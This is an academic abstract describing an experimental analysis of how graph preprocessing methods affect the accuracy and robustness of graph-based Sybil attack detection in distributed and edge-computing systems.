Sybil attacks are one of the most prominent security problems for trust mechanisms in distributed networks with large numbers of highly dynamic and heterogeneous devices, and they pose a serious threat to edge-computing-based distributed systems. Graph-based Sybil detection approaches extract social structures from the target distributed systems, refine the graph via preprocessing methods, and capture Sybil nodes based on specific properties of the refined graph structure. Graph preprocessing is a critical component of such Sybil detection methods, and intuitively, the processing methods will affect detection performance. Thoroughly understanding this dependency on the graph-processing methods is therefore very important for developing and deploying Sybil detection approaches. In this paper, we design experiments and conduct a systematic analysis of graph-based Sybil detection with respect to different graph preprocessing methods in selected network environments. The experimental results disclose the sensitivity in accuracy and robustness of Sybil detection methods caused by different graph transformations.